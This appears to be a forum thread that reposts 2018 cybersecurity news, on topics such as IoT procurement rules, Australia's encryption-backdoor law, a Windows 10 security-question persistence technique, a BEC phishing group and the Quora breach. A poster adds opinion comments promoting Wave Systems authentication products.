The Internet of Things Federal Cybersecurity Improvement Act, which Rep. Robin Kelly, D-Ill., plans to introduce next week, would require all internet-connected devices purchased by the government to meet a set of basic cybersecurity standards. The bill would also pressure agencies to avoid using so-called "lowest price technically acceptable" criteria when choosing vendors for those devices.
Under the legislation, the government could only buy devices that accept security patches and allow users to change passwords. Vendors would also need to notify agencies of any security vulnerabilities they discover and issue software update as new threats arise.
“Everything from our national security to the personal information of American citizens could be vulnerable because of security holes in these devices,” Kelly said in an email to Nextgov. “As these devices positively revolutionize communication, we cannot allow them to become a backdoor to hackers or tools for cyberattacks.”
Under the bill, the Office of Management and Budget director would work with the General Services administrator, the secretaries of Defense, Commerce and Homeland Security, and leaders from the intelligence and national security communities to guarantee those standards and any others they deem necessary are included in federal contracts. They’d have 180 days to do so.
The Homeland Security secretary and OMB director would also have 180 days to create a database of non-compliant devices and list others that no longer receive security updates.
The legislation serves as the House counterpart to the Internet of Things Cybersecurity improvement Act, which Sen. Mark Warner, D-Va., introduced last year.
While the bills share much of the same language, Kelly’s version would give agency chief information officers more authority to waive device requirements in certain circumstances.
Her bill also explicitly requires the OMB director and GSA administrator to guide agencies in limiting the use of lowest price technically acceptable criteria when selecting device vendors. Doing so would give the government more leeway to buy from companies that place a high value on security, which could incentivize others to adopt stricter standards for their own tech.
The idea is that paying more for security upfront would save agencies money in the long run.
The bill "leverages federal purchasing power to create pro-security market pressure and … serves as a model for the implementation of similar standards elsewhere," said Harvard University law and computer science professor Jonathan Zittrain.
Kelly released a draft of the bill in August 2017 and updated the legislation to reflect feedback from OMB, security advocates and the tech industry, she said. The original version, for instance, would have created an advisory board to explore effective standards for the internet of things, but that measure was cut from the final text.
“My goal was to create the best possible legislation to harden government-purchased and used [internet of things] devices,” she said. “We have made significant changes in order to build support and ensure a definition appropriate for the ever-evolving world of [the internet of things].”
=================================================================
Existing TPM based computers should be required to be activated to protect these devices, and this could provide feedback for the IOT devices that would be 'hardened'. imo.
=================================================================
https://www.wavesys.com/products/wave-virtual-smart-card
https://www.wavesys.com/products/embassy%C2%AE-remote-administration-server-tpm-management
Australia passes world's first law authorizing encryption backdoors
https://www.cyberscoop.com/australia-encryption-backdoors-law-passes/
Australia’s Parliament on Thursday passed the world’s first law requiring technology companies to give law enforcement officials access to encrypted messages and communications.
The law authorizes police to compel companies to create a security vulnerability, often called a backdoor, that would give investigators access to an individual’s communication without that person’s knowledge. It marks a major milestone in the so-called “crypto wars” over the public’s ability to “go dark” via the powerful encryption available on commercial devices.
Authorities in Australia, U.S., and U.K. for years have argued such access is necessary to help police combat encryption in modern technology that protects them from traditional interception techniques. Privacy advocates, technologists and businesses including Apple have criticized the Australian bill and similar proposals elsewhere, saying such plans would introduce portals for government abuse and malicious hackers alike.
Companies that fail to obey the law risk being fined.
“This ensures that our national security and law enforcement agencies have the modern tools they need, with appropriate authority and oversight, to access the encrypted conversations of those who seek to do us harm,” said Christian Porter, Australia’s attorney general.
International officials who have pushed for their own measures now will watch the next phase of the “going dark” debate unfold in Australia.
“Once you’ve built the tools, it becomes very hard to argue that you can’t hand them over to the U.S. government, the U.K. – it becomes something they can all use,” Lizzie O’Shea, a human rights lawyer, told the New York Times this week.
O’Shea previously wrote in a Times editorial that other nations in Five Eyes intelligence sharing alliance — made up of Australia, Britain, Canada, New Zealand and the U.S. — have pushed for Australia to “lead the charge” in finding a way to crack encrypted data. The country does not have a bill of rights, making it “a logical place to test new strategies” for breaching apps like WhatsApp and Signal.
“The truth is that there is simply no way to create tools to undermine encryption without jeopardizing digital security and eroding individual rights and freedoms,” she wrote. “Hackers with bad intentions will do their utmost to take advantage of any such tools that companies are forced to provide the government.”
=================================================================
The TPM is considerably better than software alone at protecting a client's computer. This law should give organizations/users even more reason to activate this amazing piece of hardware in their computers. For without the activation, the user is depending on software to protect his/her computer.
Wave's ERAS is a product that could help the TPM be activated en masse. Because of this new law Scrambls and/or Chadder could be worth a new look. imo.
U.S. Readies Charges Against Chinese Hackers
https://www.wsj.com/articles/u-s-readies-charges-against-chinese-hackers-1544206196
Government-linked hackers allegedly engaged in a multiyear scheme to break into U.S. technology service providers
-see link for article
================================================================
Will the U.S. or China activate their TPMs first en masse or do it simultaneously? It appears that one country could have a distinct defensive advantage over another by activating their TPMs first! See Wave ERAS below for one of those advantages!
==================================================================
https://www.wavesys.com/products/wave-virtual-smart-card
https://www.wavesys.com/products/embassy%C2%AE-remote-administration-server-tpm-management
Excerpts:
Secure device & user authentication
Sometimes it feels like security is more effective at deterring your users than hackers. But you still have to protect your enterprise resources, and we’re here to help. We take pride in securing your network, data, and resources to an unprecedented level, without causing a revolt from either IT or your users. In fact, your users probably won’t even know we’re there.
Here’s how it works:
Trusted Platform Module (TPM) + Wave’s ERAS for TPM Management = hardware-secured, fully-managed authentication
Most of your devices already come with TPMs (check out our “What is a TPM?” brochure if you’re not sure why this is exciting). This security chip comes attached to the motherboard of most enterprise-class PCs. There’s nothing “add-on” about it. The TPM provides a verifiable, unique identity for each machine.
Wave’s ERAS for TPM Management gives IT remote, centralized management of all TPMs on enterprise computers and tablets.
With this control, IT can set policies and dictate which machines and users have authority to access which resources. IT can ensure that only known and approved devices are accessing your network. And what’s more, IT can prove it with detailed activity logs.
Windows 10 Security Questions Prove Easy for Attackers to Exploit
https://www.darkreading.com/endpoint/windows-10-security-questions-prove-easy-for-attackers-to-exploit/d/d-id/1333404
New research shows how attackers can abuse security questions in Windows 10 to maintain domain privileges.
Attackers targeting Windows are typically after domain admin privileges. Once they have it, researchers say, the security questions feature built into Windows can help them keep it.
In a presentation at this week's Black Hat Europe, security researchers from Illusive Networks demonstrated a new method for maintaining domain persistence by exploiting Windows 10 security questions. Despite good intentions, the feature, introduced in April, has the potential to turn into a durable, low-profile backdoor for attackers who know how to exploit it.
Windows admins are prompted to set up security questions as part of the Windows 10 account setup process. Tom Sela, head of security research at Illusive Networks, said the addition reflects a broader effort by Microsoft to build security into Windows 10. However, it also shows the delicate balance companies must strike in maintaining usability while improving protection.
"I think Microsoft also wants to introduce new usability features," Sela explained in an interview with Dark Reading. "There is a fine line with advancing security but also adding new usability features that may compromise security."
Magal Baz, security researcher at Illusive Networks, said the questions are more of a usability feature, designed for convenience, than a security mechanism. Today, if you forget your Windows login password, you're locked out of your machine and have to reinstall the operating system to regain access, he said. The questions feature lets users log back into their accounts by providing the name of their first pet, for example, in lieu of their password.
"Now in terms of security ... I don't think that it is well-protected," he explained. Because those questions and answers have the same power as a password, you'd think they would be as secure. However, unlike passwords, answers to security questions are not long and complex, they don't expire, and most of the time they don't change. "All the limitations that make passwords safer are not applied on the security questions," Baz pointed out.
In addition to having answers that can be found on social networks, the security questions "are not monitored. There are no policies around it – it's just there," he continued. "It allows you to regain access to the local administrative account." There's a reason why companies including Facebook and Google have stopped using security questions to secure accounts, Baz added.
Unlocking Admins' Answers
Before describing how this approach works, it's important to add context first. In recent years, attackers have not only sought domain access but a means of maintaining a reliable and low profile on the domain. The process of becoming a domain admin has become much easier, Baz added. "A couple of years ago, it was thought this could take months ... it has shrunk into hours," he says.
To turn the questions feature into a backdoor, an attacker must first find a way to enable and edit security questions and answers remotely, without the need to execute code on the target machine. The attacker must also find a way to use preset Q&A to gain access to a machine while leaving as few traces as possible, Baz and Sela explained in their presentation.
Windows 10 security questions and answers are stored as LSA Secrets, where Windows stores passwords and other data for everyday operations. With administrative access to the registry, one can read and write LSA Secrets. One can change a user's security questions and answers, installing a backdoor to access the same system in the future.
An attacker could remotely use this feature, for any and all of the Windows 10 machines in the domain, to control security questions and answers to be something he chooses, Baz said. The implications for someone abusing this without the account holder's knowledge are huge. Unlike passwords, which eventually expire and can be edited any time, security questions are static. The name of your first pet or mother's maiden name, for example, don't change, Baz pointed out.
Sela and Baz described use cases in which this tactic can be useful for an attacker. Someone could "spray" security questions across all Windows 10 machines and ensure a persistent hold in the network by ensuring everyone's dog is named Fluffy – and Fluffy is the name of everybody's birthplace, place where their parents met, model of their first car, etc.
What's more, security questions and answers aren't carefully protected. "The questions today are not monitored, are not changed. Probably most of IT admins are not even aware of their existence at the time being," Baz continued. "The implications ... for now [are] permanent access to all Windows 10 machines in the network quite easily and in low-profile manner."
The security questions also don't come with auditing capabilities, Sela added. "Even [for] IT administrators that would like to be aware of that, out of the box, Windows doesn't give them a way to monitor the status of those security questions."
Best Practices and Deleting Security Questions
Admins should constantly monitor security questions to make sure they are unique, or disable them by periodically changing them to random values, Baz and Sela said.
"Even before the question of security questions, it's a good practice to have as few local admins as possible on the network," Baz said.
Security admins don't feel good about the tool, the researchers said, noting how many people are looking for ways to get rid of it. As part of their presentation, Baz and Sela also shared an open-source tool they developed that can control or disable the security questions feature and mitigate the risk of questions being used as a backdoor into a Windows 10 machine.
=================================================================
Companies with Windows 10 computers may want to use Wave's Helpdesk - assisted PIN reset in Wave VSC 2.0 instead of the unreliable security questions method used by Windows 10. The article presents a very good case for using Wave's Helpdesk - assisted PIN reset. Its another good selling point for Wave VSC 2.0. imo.
================================================================
https://www.wavesys.com/products/wave-virtual-smart-card
Excerpt:
Key Features:
• Full lifecycle management of virtual smart cards
• Intuitive interface to create (or delete) virtual smart cards
• Command line option to create and delete virtual smart cards
• Flexible PIN policies
• Helpdesk-assisted PIN reset and recovery
• Generates reports for compliance
• Integrates with Active Directory
• Supports familiar use cases ? Virtual Private Network (VPN)
? Local logon
? Remote logon
? Remote desktop access
? Intranet/Extranet
? Cloud applications
This phishing scam group built a list of 50,000 execs to target
https://www.zdnet.com/article/this-phishing-scam-group-built-a-list-of-50000-execs-to-target/
CEO fraud group has a big list of potential victims; just hope you aren't on it.
A group of online scammers has generated a list of 50,000 of executives including CFOs and other finance chiefs to use as targets for their schemes.
The list was discovered by security company Agari after the scammers unwisely targeted the company with one of its scams, prompting the company to investigate further.
The group - which Agari is calling London Blue - seems to specialise in business email compromise (BEC) scams. While there are many variations, the basic aim is to trick someone within an organisation - usually working in finance - to send funds to a bank account controlled by the crooks, thinking that the transfer is a request from someone senior inside their own organisation. Long before the mistake is discovered the funds have been moved or withdrawn.
The phishing emails sent by groups like this typically contain no malware, making it much harder for them to be spotted by standard automated security measures; many major security breaches now start with a phishing email. Also known as CEO frauds these can be extremely lucrative for the crooks, devastating for the company hit, and very hard for police to tackle. The FBI puts the cost of these scams at somewhere around $12bn.
Agari's analysis shows how sophisticated these groups are becoming.
"London Blue operates like a modern corporation. Its members carry out specialized functions including business intelligence (lead generation), sales management (assignment of leads), email marketing (semi-customized BEC attack emails), sales (the con itself, conducted with individual attention to the victim), financial operations (receiving, moving and extracting the funds), and human resources (recruiting and managing money mules)," the company said
The security company said it came across the list of execs as part of its research. The scammers had generated the list in early 2018 to be used in future BEC phishing campaigns. Of the names on the list, 71 percent were CFOs, two percent were executive assistants, and the remainder were other finance leaders. Several of the world's biggest banks each had dozens of executives listed, the company said. The group also singled out mortgage companies for special attention, which would enable scams that steal real estate purchases or lease payments. Over half of the 50,000 potential victim profiles that London Blue compiled in their targeting database were located in the US; other countries commonly targeted included Spain, the United Kingdom, Finland, the Netherlands and Mexico.
"In our analysis of London Blue, we identified the working methods of a group that has taken the basic technique of spear-phishing--using specific knowledge about a target's relationships to send a fraudulent email--and turned it into massive BEC campaigns," the company said. It said the group was likely based in Nigeria but also had members elsewhere including the US and UK.
=================================================================
As I understand it, Chadder was built partly based on Scrambls. It would make sense for these 50,000 CFOs/CEOs to have Chadder to confirm a bank transfer as a secondary means of confirmation. imo. Then marketing Chadder to the rest of company employees could be an easier marketing proposition.
Quora discloses mega breach impacting 100 million users
https://www.zdnet.com/article/quora-discloses-mega-breach-impacting-100-million-users/
Account info, passwords, emails, private messages, and user votes were exposed
Quora, one of the largest question-and-answer portals on the Internet, said today that hackers gained access to its servers and stole information on approximately 100 million of its users, which represents almost half of the site's total userbase.
The company disclosed the breach today but said it discovered the hack last week, on Friday. Quora is still investigating the incident but said it already determined that hackers accessed the following types of user information:
•Account information (e.g., name, email address, encrypted password, data imported from linked networks when authorized by users)
•Public content and actions (e.g., questions, answers, comments, upvotes)
•Non-public content and actions (e.g., answer requests, downvotes, direct messages)
"The overwhelming majority of the content accessed was already public on Quora, but the compromise of account and other private information is serious," said Adam D'Angelo, Quora CEO.
"Questions and answers that were written anonymously are not affected by this breach as we do not store the identities of people who post anonymous content," he added.
"It is highly unlikely that this incident will result in identity theft, as we do not collect sensitive personal information like credit card or social security numbers," the company added later today in a help page regarding the incident.
The site has already taken steps to log out all Quora users who may have been affected. Users who used a password to secure their account have already had their password invalidated and will need to choose a new one the next time they log in.
Quora said it's in the process of notifying all users who it believes were impacted by the hack. The company said that not all users were affected and that "some were impacted more than others."
The tech site also said it already took steps to "contain the incident" and prevent future unauthorized access to its servers. The company said it's still looking into the cause of the breach together with a digital forensics firm. Quora also notified law enforcement.
This is the second hack of a major tech firm in the past week after Dell announced a similar breach of its Dell.com online accounts last week.
U.S. Financial Firms to Further Increase Cybersecurity Spending
https://www.bloomberg.com/news/articles/2018-12-03/u-s-financial-firms-to-further-increase-cybersecurity-spending
U.S. banks and other financial firms are projecting higher spending on cybersecurity as they face bigger threats and more attacks.
In a survey of 100 senior security officers, 84 percent said their firms are planning to spend more this year on cybersecurity, up from 78 percent a year ago, data-security provider Thales eSecurity said in a report to be released Tuesday. About 36 percent of companies said they experienced an intrusion in 2018, up from 24 percent in last year’s survey.
Some of the largest U.S. banks already have boosted cybersecurity spending to almost $1 billion a year following high-profile attacks at companies such as Equifax Inc. and Anthem Inc. Financial firms also have increased information-sharing and set up industrywide backup systems for client data to prevent financial-system disruptions during a major hack.
Some of the spending might not be on target. The vast majority of financial firms are still spending too much on defending personal computers despite awareness that’s the least effective strategy, the Thales survey found. More attention should be paid to network security, said Andy Kicklighter, director of product marketing at the firm.
“The emphasis needs to shift to protecting data,” he said in a phone interview. “Companies are afraid that data protection will disrupt their business, but that’s a concern of yesterday. There are a multitude of solutions today that won’t disrupt or slow down regular business while protecting the data.”
=================================================================
If Wave can sign up a Fortune Global 500 financial services company for its VSC 2.0 then certainly it could sign up a lot of financial firms to use VSC 2.0. This article shows that 84% are planning on spending more money on cybersecurity this year. Given the better security of VSC 2.0 and the weaknesses of its competitors the sales process should be rather quick for many. imo. Also, 36 percent of those companies that experienced an intrusion could change and only allow known and approved devices on their network via Wave's ERAS.
================================================================
Wave Announces 5-Year Master License Agreement for Virtual Smart Card 2.0 with Leading Global Financial Services Company
Wins competitive evaluation against market leader in two-factor authentication tokens
https://www.wavesys.com/buzz/pr/wave-announces-5-year-master-license-agreement-virtual-smart-card-20-leading-global
Lee, MA -
December 17, 2015 -
Wave Systems Corp. (NASDAQ: WAVX) announces a five-year master licensing agreement (MLA) with a leading global corporation (as determined by the 2015 Fortune Global 500 List) for its Virtual Smart Card 2.0 solution. This MLA sets the terms and pricing for licenses and maintenance across the customer’s global organization and establishes it as their preferred two-factor authentication solution. Instead of one large license purchase for the entire organization, each of the customer’s subordinate divisions will make separate orders in accordance with the terms of this MLA.
The first purchase of 2,000 VSC 2.0 licenses under this agreement, when added to a previous purchase, completes the requirement for the customer’s global IT division. That division will now lead the internal effort to standardize the remaining 150,000+ endpoints within their organization with the new Wave VSC 2.0 solution. While there are no minimum order requirements under the agreement, discussions for additional orders are underway.
“Our five-year agreement with this customer is the first very large scale contract for VSC 2.0 and is an important milestone for Wave,” said Bill Solms, President and CEO of Wave Systems. “This customer is a major global financial services company and their standards for protecting their systems from unauthorized access and the integrity of their data are of the highest order. Wave had to pass a very rigorous technical and business review to win the competition. We believe that this client’s decision to choose Wave Virtual Smart Card 2.0 over their incumbent solution gives us tremendous credibility in the two-factor authentication market. We will remain engaged with this company in order to complete the additional sales and deployments in the months ahead.”
Wave Virtual Smart Card 2.0 is a tokenless, hardware-based, two-factor authentication solution that offers superior security at less than half the cost of comparable solutions. It is the industry’s only enterprise-grade virtual smart card management solution that works on Windows 7, 8 and 10. It also provides management support for the Microsoft Virtual Smart Card on Windows 8 and 10. Wave’s VSC solution emulates the functionality of physical smart cards or tokens, but offers greater convenience to users, significantly lower total cost of ownership, and a greatly reduced risk of unauthorized access.
Wave Virtual Smart Card 2.0 gives IT the ability to:
• Remotely create and delete virtual smart cards
• Provide help desk-assisted recovery
• Configure Passphrase and card policies
• View the status of virtual smart cards and enrolled certificates
• Generate reports for compliance
• Support virtual smart cards on laptops, tablets and desktops with both TPM 1.2 and TPM 2.0 security chips
=================================================================
https://www.wavesys.com/products/wave-virtual-smart-card
https://www.wavesys.com/products/embassy%C2%AE-remote-administration-server-tpm-management
Excerpt:
Here’s how it works:
Trusted Platform Module (TPM) + Wave’s ERAS for TPM Management = hardware-secured, fully-managed authentication
Most of your devices already come with TPMs (check out our “What is a TPM?” brochure if you’re not sure why this is exciting). This security chip comes attached to the motherboard of most enterprise-class PCs. There’s nothing “add-on” about it. The TPM provides a verifiable, unique identity for each machine.
Wave’s ERAS for TPM Management gives IT remote, centralized management of all TPMs on enterprise computers and tablets.
With this control, IT can set policies and dictate which machines and users have authority to access which resources. IT can ensure that only known and approved devices are accessing your network. And what’s more, IT can prove it with detailed activity logs.
MITRE Changes the Game in Security Product Testing
https://www.darkreading.com/endpoint/mitre-changes-the-game-in-security-product-testing/d/d-id/1333374
Nonprofit has published its first-ever evaluation of popular endpoint security tools - measured against its ATT&CK model.
There were no grades, scores, or rankings, but today's official release by MITRE of the results from its tests of several major endpoint security products could signal a major shift in the testing arena.
MITRE, a nonprofit funded by the US federal government, in its inaugural commercial tests pitted each product against the well-documented attack methods and techniques used by the Chinese nation-state hacking group APT3, aka Gothic Panda, drawn from MITRE's widely touted - and open - ATT&CK model.
Endpoint detection and response (EDR) vendors Carbon Black, CrowdStrike, CounterTack, Endgame, Microsoft, RSA, and SentinelOne played blue team with their products against a red team of experts from MITRE. Unlike traditional third-party product testing in security, the ATT&CK (Adversarial Tactics, Techniques, and Common Knowledge) approach uses open standards, methods, and the vendors perform live defenses with their products.
The testing operates in a collaborative manner. "They invited the vendors in to help them drive the tool and show how they find [attacks]," says Mark Dufresne, vice president of research for Endgame. "MITRE was sitting right there, and the product wasn't just chucked over the wall" and tested like in many other third-party tests.
"It was a collaborative and conversational, versus transactional, model," he says.
MITRE tracks and documents how the tools are tuned and configured, and how they do or don't detect an offensive move by its "APT3" red team, for example. The results get published on MITRE's website for anyone to see and study.
"We really want this to be a collaborative process with the vendors; we want them to be part of the process," says Frank Duff, MITRE's lead engineer for the evaluations program. The goal is both to improve the products as well as share the evaluations publicly so organizations running those tools or shopping for them can get an in-depth look at their capabilities, according to Duff.
MITRE chose APT3's methods of attack, which include credential-harvesting and employing legitimate tools used by enterprises to mask their activity. Each step of the attack is documented, such as how the tool reacted to the attacker using PowerShell to mask privilege-escalation. ATT&CK is based on a repository of adversary tactics and techniques and is aimed at helping organizations find holes in their defenses. For security vendors, ATT&CK testing helps spot holes or weaknesses in their products against known attack methods.
The collaborative and open testing setup represents a departure from traditional third-party testing. Vendors and labs traditionally have had an uneasy and sometimes contentious relationship over control of the testing process and parameters. Longtime friction in the security product test space erupted into an ugly legal spat in September, when testing firm NSS Labs filed an antitrust lawsuit against cybersecurity vendors CrowdStrike, ESET, and Symantec, as well as the nonprofit Anti-Malware Testing Standards Organization (AMTSO), over a vendor-backed testing protocol.
The suit claims the three security vendors and AMTSO, of which they and other endpoint security vendors are members, unfairly allow their products to be tested only by organizations that comply with AMTSO's testing protocol standard.
"The whole testing landscape is a real mess," Endgame's Dufresne says. "[But] as a vendor, it's important to be there."
NSS Labs, which is a member of AMTSO, was one of a minority of members that voted against the standard earlier this year; the majority of members support it and plan to adopt it. "Our fundamental focus is if a product is good enough to sell, it's good enough to test. We shouldn't have to comply to a standard on what and how we can test," said Jason Brvenik, chief technology officer at NSS Labs, in an interview with Dark Reading after the suit was filed.
Traditional third-party tests, such as those conducted by NSS Labs, AV-Test, and AV-Comparatives, focus mainly on file-based malware, Endgame's Dufresne explains, looking at whether the security product blocks specific malware. "We do participate in those ... but they truly miss a huge swath of overall attacker activity."
MITRE's Duff says there are different security product tests for different purposes. ATT&CK is all about openness and providing context to the evaluation, he says. "All different testing services have their own purpose, value, and approaches. This is our approach, and we are hoping it resonates to the public."
Even so, malware-based testing isn't likely to go away. "I think some buyers like to see a number" like those tests provide, Endgame's Dufresne says.
Greg Sim, CEO of Glasswall Solutions, says third-party testing was overdue for a change. Even when they garner high scores from the antimalware testing labs, some products continue to fail in real-world attacks, he says. "I think there's going to be a different model," he says, noting that his firm has run tests with MITRE, which it considers an example of a reputable third party for testing.
Another security vendor executive who requested anonymity says MITRE's entry into the testing arena came just at the right time. "Emulating tradecraft of a known adversary, nation/state - for us on the vendor side, we’re saying, 'Hallelujah, they are doing it the right way,'" he says.
MITRE's new testing service represents new territory for the nonprofit, but that doesn't mean its federal government work will subside. Vendors pay a fee, which MITRE would not disclose. "MITRE historically has focused on doing testing of solutions for US government customers or sponsors. That role is not going anywhere," Duff notes.
MITRE hasn't yet set a timeframe for its next series of tests, he adds, but the team will pick another APT group to emulate.
"We are just trying to get at the ground truth on these tools," Duff says
=================================================================
It seems that Wave was a first mover with the Wave Endpoint Monitor and they could get better results than its competitors in MITRE testing!
=================================================================
Wave Integrating MITRE’s Attestation Technique into its Endpoint Monitor for Remediating Advanced Malware
https://www.wavesys.com/buzz/pr/wave-integrating-mitre%E2%80%99s-attestation-technique-its-endpoint-monitor-remediating-advanced-mal
MITRE Details Technique at Black Hat 2013
Lee, MA -
July 31, 2013 -
Wave Systems Corp. (NASDAQ:WAVX), the Trusted Computing Company, announced plans to integrate The MITRE Corporation’s new timing-based attestation technique into Wave Endpoint Monitor (WEM), the industry’s first solution to leverage industry standard hardware to detect and remediate malware that can surreptitiously mount attacks before the operating system loads. MITRE is a not-for-profit organization that provides systems engineering, research and development, and information technology support to the government.
With this enhancement, Wave will integrate MITRE’s technique that doubly verifies that the core BIOS hasn’t been corrupted. The BIOS is the first software run by the PC when powered-on and is responsible for initializing hardware and getting the operating system running. It also contains the “core root of trust measurement” (CRTM) software, the first software in the boot trust chain that ends in the assurance that the computer booted safely.
“MITRE has made a significant contribution to the body of research by identifying a scenario in which malicious code could be introduced to the BIOS that would cause it to provide a false reading and allow the malicious BIOS to indicate the system had not been corrupted,” said Dr. Robert Thibadeau, Wave’s Chief Scientist. “MITRE’s technique offers a second control for determining the CRTM does not lie about itself and any of the rest of the trust chain.”
Dr. Thibadeau added, “While BIOS attacks are still fairly rare today—less than one percent by many accounts—they represent a new and dangerous attack vector, and we’re bound to see more in future years as the more popular preboot targets are secured by our existing WEM technology.”
The management of CRTM detection will be incorporated in a module for WEM, which Wave expects will be production-ready in early 2014 to meet the expected increase of these attacks. Wave Endpoint Monitor captures verifiable PC health and security by utilizing information stored within the TPM. If anomalies are detected, the attack is controlled, and IT is alerted immediately with real-time analytics.
MITRE research presented at Black Hat 2013
MITRE researchers John Butterworth, Corey Kallenberg, and Xeno Kovah presented their research on this vulnerability and technique, “BIOS Chronomancy: Fixing the Core Root of Trust for Measurement,” at Black Hat 2013.
The team’s research highlights a vulnerability in which a firmware rootkit tricks an endpoint’s Trusted Platform Module (TPM) chip into reporting a clean BIOS firmware, when in fact it has been compromised. MITRE’s research shows the importance of using timing-based attestation systems, which can defend against attackers who obtain the same privilege levels as the defender. John Butterworth, a Senior Infosec Engineer at MITRE, adds, “additional complexities are imposed on an attacker who tries to conceal a rootkit in the presence of timing-based attestation; even concealing the modification of a single byte will trigger a measurable change.”
The team’s findings come as vendors work to implement BIOS protection specifications as outlined by the National Institute of Standards and Technology (NIST) special publication 800-155, published in 2011.
==================================================================
https://www.wavesys.com/products/wave-endpoint-monitor
White House Identifies Financial Industry as Key Cybersecurity Focus Area
https://biztechmagazine.com/article/2018/11/white-house-identifies-financial-industry-key-cybersecurity-focus-area
On the heels of fresh scrutiny for banks, the Trump administration affirmed financial services companies as a top target for cyberattacks.
The Trump administration recently published a revised National Cyber Strategy, which identifies banking and finance as one of seven key areas where the White House will strive to reduce cybersecurity risks. The administration’s work with the financial industry will build upon months of recommendations from private and public organizations on how to protect America’s most attractive sector for cyberattacks.
“The Administration will develop a comprehensive understanding of national risk by identifying national critical functions and will mature our cybersecurity offerings and engagements to better manage those national risks. The Administration will prioritize risk-reduction activities across seven key areas,” including banking and finance, the strategy states.
Earlier this year, the Council of Economic Advisers estimated that malicious cyberactivity cost the U.S. economy between $57 billion and $109 billion in 2016. The financial services industry proved an particularly attractive target for hackers that year. “It was attacked 65 percent more than the average organization across all industries, and according to IBM, 200 million financial services records were breached in 2016, a 900 percent increase from 2015,” reports Security magazine.
For financial services firms, public and private entities have instituted requirements to mitigate the damage from cyberattacks. The federal government also requires cyber disclosures from the banking industry. Banks and certain financial institutions must undergo reviews of “their safeguards for protecting the security, confidentiality, and integrity of consumer information, which include disclosure requirements in the event of a breach,” states the Council of Economic Advisors.
Meanwhile, a financial services consortium — composed of Bank of America, JPMorgan Chase, Wells Fargo and American Express — set up TruSight, a company that provides risk assessments of third-party suppliers and partners, including cybersecurity vendors.
Cyberattacks Pose Extra Dangers for Financial Institutions
Cyberdefenses for financial services firms have been top of mind for the industry since the Equifax breach in 2017. In that breach, “more than 147 million people in the U.S. had personal and financial data stolen ranging from Social Security and driver’s license numbers to credit card information and birth dates,” notes SecurityInfoWatch.com.
Experts warn that banks not only suffer direct financial losses due to successful cyberattacks, but also suffer indirect losses. In an interview with The Wall Street Journal at the end of last year, CrowdStrike CEO George Kurtz warned of the danger to banks of shutting down during a cyberattack.
“When you can’t trade, when you are under attack, there is a loss of confidence in that particular institution. Some of these institutions, if they’re out of business or they’re not operational, it’s a massive ripple,” Kurtz said.
In the same interview, Barclays Group Security Division CIO Elena Kvochko prescribed a holistic approach to cybersecurity for banks.
“No matter how you structure your technology teams, what’s important is to be able to have a holistic perspective across your business lines and product lines, to be able to see there is an anomaly or an incident happening in one part of the organization, you’re able to connect it to potentially other related events that are happening,” Kvochko said.
Implementing a new process could require three months to a year before it becomes a habit — and thus part of the security culture — within an institution, Kvochko added.
-rest is at the link.
=================================================================
If someone in Trump's office was aware of the two factor authentication that exists in the financial services industry, they'd be happy to see the 2FA displaced with Wave VSC 2.0. imo.
=================================================================
Wave Announces 5-Year Master License Agreement for Virtual Smart Card 2.0 with Leading Global Financial Services Company
https://www.wavesys.com/buzz/pr/wave-announces-5-year-master-license-agreement-virtual-smart-card-20-leading-global
Wins competitive evaluation against market leader in two-factor authentication tokens
Lee, MA -
December 17, 2015 -
Wave Systems Corp. (NASDAQ: WAVX) announces a five-year master licensing agreement (MLA) with a leading global corporation (as determined by the 2015 Fortune Global 500 List) for its Virtual Smart Card 2.0 solution. This MLA sets the terms and pricing for licenses and maintenance across the customer’s global organization and establishes it as their preferred two-factor authentication solution. Instead of one large license purchase for the entire organization, each of the customer’s subordinate divisions will make separate orders in accordance with the terms of this MLA.
The first purchase of 2,000 VSC 2.0 licenses under this agreement, when added to a previous purchase, completes the requirement for the customer’s global IT division. That division will now lead the internal effort to standardize the remaining 150,000+ endpoints within their organization with the new Wave VSC 2.0 solution. While there are no minimum order requirements under the agreement, discussions for additional orders are underway.
“Our five-year agreement with this customer is the first very large scale contract for VSC 2.0 and is an important milestone for Wave,” said Bill Solms, President and CEO of Wave Systems. “This customer is a major global financial services company and their standards for protecting their systems from unauthorized access and the integrity of their data are of the highest order. Wave had to pass a very rigorous technical and business review to win the competition. We believe that this client’s decision to choose Wave Virtual Smart Card 2.0 over their incumbent solution gives us tremendous credibility in the two-factor authentication market. We will remain engaged with this company in order to complete the additional sales and deployments in the months ahead.”
Wave Virtual Smart Card 2.0 is a tokenless, hardware-based, two-factor authentication solution that offers superior security at less than half the cost of comparable solutions. It is the industry’s only enterprise-grade virtual smart card management solution that works on Windows 7, 8 and 10. It also provides management support for the Microsoft Virtual Smart Card on Windows 8 and 10. Wave’s VSC solution emulates the functionality of physical smart cards or tokens, but offers greater convenience to users, significantly lower total cost of ownership, and a greatly reduced risk of unauthorized access.
Wave Virtual Smart Card 2.0 gives IT the ability to:
• Remotely create and delete virtual smart cards
• Provide help desk-assisted recovery
• Configure Passphrase and card policies
• View the status of virtual smart cards and enrolled certificates
• Generate reports for compliance
• Support virtual smart cards on laptops, tablets and desktops with both TPM 1.2 and TPM 2.0 security chips
=================================================================
https://www.wavesys.com/products/wave-virtual-smart-card
https://www.wavesys.com/products/embassy%C2%AE-remote-administration-server-tpm-management
https://www.wavesys.com/virtual-smart-card-2.0-from-wave
US Senate computers will use disk encryption
https://www.zdnet.com/article/us-senate-computers-will-use-disk-encryption/
New security measure is meant to protect sensitive Senate data on stolen Senate laptops and computers
The US Senate will enable disk encryption on all Senate computers as a basic security measure that will make it harder for spies or criminals to extract sensitive data from stolen Senate staff PCs or hard drives.
The decision was taken last month by the Senate Committee on Rules and Administration, which instructed the Senate Sergeant at Arms (SAA) to begin the data encryption process.
"I applaud these efforts as this new common-sense cybersecurity policy will better protect sensitive Senate data from those who might wish to compromise it," said Oregon Democrat Senator Ron Wyden, the one who initially pushed the Committee to implement this measure over the summer.
"This new policy will make it much harder for any would-be spy or criminal who steals a Senate computer to access Senate data," Sen. Wyden added. "This is particularly important for laptops, which are more vulnerable to foreign government surveillance when Senate staff take them home or on work-related travel."
Details about the exact timeline or progress of the disk encryption process have not been made available, but Senators and their staff should hope this doesn't go as bad as the adoption of multi-factor authentication. A government report published in September revealed that only 11 percent of the Department of State's devices used multi-factor authentication.
